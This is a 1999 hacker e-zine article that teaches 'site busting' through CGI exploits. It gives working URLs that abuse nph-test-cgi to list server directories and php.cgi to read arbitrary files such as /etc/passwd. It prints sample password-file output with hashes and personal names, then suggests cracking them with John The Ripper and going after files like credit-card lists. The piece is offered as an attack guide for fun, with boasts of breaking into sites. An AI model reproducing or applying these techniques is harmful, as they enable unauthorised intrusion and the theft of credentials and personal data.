_________SWAT MAGAZINE ISSUE TWENTY FOUR: DECEMBER 1999_________ / \___________________________________________/ \ / Site Busting: CGI Exploits part I \ / by -=The Firestarter=- \ ----------------------------------------------------------------------- Ok so i was board out of my skull and i decided to share with you some of my knowledge of CGI hacking, since that is the main method i use when it comes to "site busting". I'll detail some of the information as i would go about cracking sites, namly via Netscape Navigator (ok so i'll do as much as i can with that, then telnet to my shell account and continue the attack), each month i'll write up one or two CGI exploits that i use to crack servers, don't expect too much though since i'm not the greatest hacker on earth. nph-test-cgi - This is the most common exploit i've come accross in my travels around cyberspace, all that this script does is display some information on the server, i.e : CGI/1.0 test script report: argc is 1. argv is \*. SERVER_SOFTWARE = Apache/1.2.6 SERVER_NAME = www.soon-2-be-hacked.net GATEWAY_INTERFACE = CGI/1.1 SERVER_PROTOCOL = HTTP/1.0 SERVER_PORT = 80 REQUEST_METHOD = GET HTTP_ACCEPT = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* PATH_INFO = PATH_TRANSLATED = SCRIPT_NAME = /cgi-bin/nph-test-cgi QUERY_STRING = REMOTE_HOST = xxx.xx.xxx.xx REMOTE_ADDR = xxx.xx.xxx.xx REMOTE_USER = CONTENT_TYPE = CONTENT_LENGTH = Ok if you enter http:///cgi-bin/nph-test-cgi into Netscape and you are presented with the above information, then the site is running a very valuble CGI script that will give us hours of fun in exploring the system. Ok so we can abuse this to take a peek at directories inside the target machine, very handy if you are looking for a file to swipe. Anyway, you go about this by entering: /cgi-bin/nph-test-cgi?/* so too see what's in the bin directory you would go to the URL: http:///cgi-bin/nph-test-cgi?/bin/* or perhaps you just want a look in the CGI-BIN? you would enter: http:///cgi-bin/nph-test-cgi?* entering http:///cgi-bin/nph-test-cgi?/* will show you the "root" directory on the system, just alter the URL accordingly to peek inside the directories. PHP.CGI This was already covered by Netw0rk Bug in a past issue, so i won't go on about it too much, basically php.cgi is a search engine with a security hole, i.e you can view ANY file on the target machine. so http:///cgi-bin/php.cgi?/etc/passwd might reveal: root:IDOSYJvnorizc:0:100:System Administrator:/:mail hfev:IDOSYJvnorizc:33:100:Bollock bollock:/:ftp;mail Alex:/NiYJVFNxWaVQ:33:100:Alex Garcia (M):/usr/home/Alex:mail argga:PGlYFYglD4rf.:33:100:Argga:/usr/home/argga:mail billc:WbxxG/2n1JHXU:33:100:Bill Carlson:/usr/home/billc:mail All you do now is to crack it using John The Ripper. But what if your unfortunate and get: rickl:x:33:100:Rick Laudenslager:/usr/home/rickl:mail,5 robertk:x:33:100:Robert Krutsch:/usr/home/robertk:mail,3 sandram:x:33:100:Sandra Mitchell:/usr/home/sandram:mail,5 sandy:x:33:100:Sandy Penninger:/usr/home/sandy:mail,5 schock:x:33:100:S.Chock:/usr/local/etc/httpd/htdocs/schock:ftp;mail tedfuji:x:33:100:Ted Fujimoto (M):/usr/home/tedfuji:mail wcrown:x:33:100:Walter Crown (M):/usr/home/wcrown:mail Well all is not lost! infact certain kiddie porn sites that have been cracked by me have come across such a problem, this is where using the nph-test-cgi explout comes in handy, you find a file that looks interesting, e.g. password.txt, accounts, creditcard, etc and use the PHP.CGI exploit to read it, but unfortunatly you need to have both the PHP.CGI and NPH-TEST-CGI to do this, oh well, have fun!